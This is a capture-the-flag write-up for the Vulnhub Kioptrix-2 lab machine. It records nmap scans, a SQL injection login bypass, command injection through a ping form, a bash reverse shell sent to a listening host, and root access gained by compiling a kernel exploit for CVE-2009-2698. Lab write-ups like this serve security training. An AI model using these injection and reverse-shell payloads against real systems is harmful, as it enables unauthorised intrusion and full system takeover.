Welcome to the Kioptrix-2 writeup from Vulnhub
I hope you enjoy reading it. Any feedback will be appreciated! @x4v1l0k


Kioptrix-2

tags: Vulnhub Easy Linux OSCP
Platform: Vulnhub
Difficult: Easy
S.O.: Linux

Kioptrix: Level 1.1 (#2)

Enumeration

Nmap

To get started, we run a quick open ports scan.

$ nmap -Pn -T4 -p- 172.20.10.7
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-30 21:35 CEST
Nmap scan report for 172.20.10.7
Host is up (0.0016s latency).
Not shown: 65528 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
111/tcp  open  rpcbind
443/tcp  open  https
631/tcp  open  ipp
792/tcp  open  unknown
3306/tcp open  mysql
MAC Address: E8:2A:EA:D1:82:F6 (Intel Corporate)

Nmap done: 1 IP address (1 host up) scanned in 5.05 seconds

Now that we know the open ports, let's scan them in depth.

$ nmap -A -Pn -p 22,80,111,443,631,792,3306 172.20.10.7
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-30 21:38 CEST
Nmap scan report for 172.20.10.7
Host is up (0.00032s latency).

PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey: 
|   1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
|   1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_  1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp   open  http     Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp  open  rpcbind  2 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1            789/udp   status
|_  100024  1            792/tcp   status
443/tcp  open  ssl/http Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-10-08T00:10:47
|_Not valid after:  2010-10-08T00:10:47
|_ssl-date: 2021-06-30T16:28:42+00:00; -3h09m41s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC4_64_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|_    SSL2_DES_192_EDE3_CBC_WITH_MD5
631/tcp  open  ipp      CUPS 1.1
| http-methods: 
|_  Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
792/tcp  open  status   1 (RPC #100024)
3306/tcp open  mysql    MySQL (unauthorized)
MAC Address: E8:2A:EA:D1:82:F6 (Intel Corporate)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
Network Distance: 1 hop

Host script results:
|_clock-skew: -3h09m41s

TRACEROUTE
HOP RTT     ADDRESS
1   0.32 ms 172.20.10.7

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.24 seconds

Port 80

Within the website of port 80 we find an authentication form.

Knowing that MySQL is installed on the server as we have seen in the Nmap analysis, we are going to try the typical injection 'OR' 1 '=' 1.

And we are in!
Now, we find a form that allows us to ping an IP address

Exploitation

To test if we can inject commands, we are going to execute the request by launching the local IP with the concatenated id command 127.0.0.1;id.

127.0.0.1;id

PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=0 ttl=64 time=0.010 ms
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.014 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.043 ms

--- 127.0.0.1 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 1999ms
rtt min/avg/max/mdev = 0.010/0.022/0.043/0.015 ms, pipe 2
uid=48(apache) gid=48(apache) groups=48(apache)

Yeah, we have RCE, let's go for a shell!

We put a terminal to listen and execute the form with our shell as payload

127.0.0.1;bash -i >& /dev/tcp/172.20.10.4/8787 0>&1

We wait a few seconds...

$ nc -lnvp 8787
listening on [any] 8787 ...
connect to [172.20.10.4] from (UNKNOWN) [172.20.10.7] 32769
bash: no job control in this shell
bash-3.00$ id
uid=48(apache) gid=48(apache) groups=48(apache)
bash-3.00$

And we have a shell as apache!

Post exploitation

Privilege escalation: apache to root

Enumeration

Linux Exploit Suggester 2

bash-3.00$ perl linux-exploit-suggester-2.pl 

  #############################
    Linux Exploit Suggester 2
  #############################

  Local Kernel: 2.6.9
  Searching 72 exploits...

  Possible Exploits
  [1] american-sign-language
      CVE-2010-4347
      Source: http://www.securityfocus.com/bid/45408
  [2] exp.sh
  [3] half_nelson1
      Alt: econet       CVE-2010-3848
      Source: http://www.exploit-db.com/exploits/17787
  [4] half_nelson2
      Alt: econet       CVE-2010-3850
      Source: http://www.exploit-db.com/exploits/17787
  [5] half_nelson3
      Alt: econet       CVE-2010-4073
      Source: http://www.exploit-db.com/exploits/17787
  [6] krad
  [7] krad3
      Source: http://exploit-db.com/exploits/1397
  [8] pktcdvd
      CVE-2010-3437
      Source: http://www.exploit-db.com/exploits/15150
  [9] py2
  [10] sock_sendpage
      Alt: wunderbar_emporium       CVE-2009-2692
      Source: http://www.exploit-db.com/exploits/9435
  [11] sock_sendpage2
      Alt: proto_ops       CVE-2009-2692
      Source: http://www.exploit-db.com/exploits/9436
  [12] udp_sendmsg_32bit
      CVE-2009-2698
      Source: http://downloads.securityfocus.com/vulnerabilities/exploits/36108.c
  [13] video4linux
      CVE-2010-3081
      Source: http://www.exploit-db.com/exploits/15024

Knowing that the machine has the sendmessage service running, we are going to use the CVE-2009-2698.

Exploitation

CVE-2009-2698

The link that the script offers us does not work at the moment but, we can easily find it online by looking for the name or the CVE. For example in this link

bash-3.00$ gcc udp_sendmsg_32bit.c -o 0x82-CVE-2009-2698 && ./0x82-CVE-2009-2698
sh-3.00# id
uid=0(root) gid=0(root) groups=48(apache)
sh-3.00#

And that's all folks!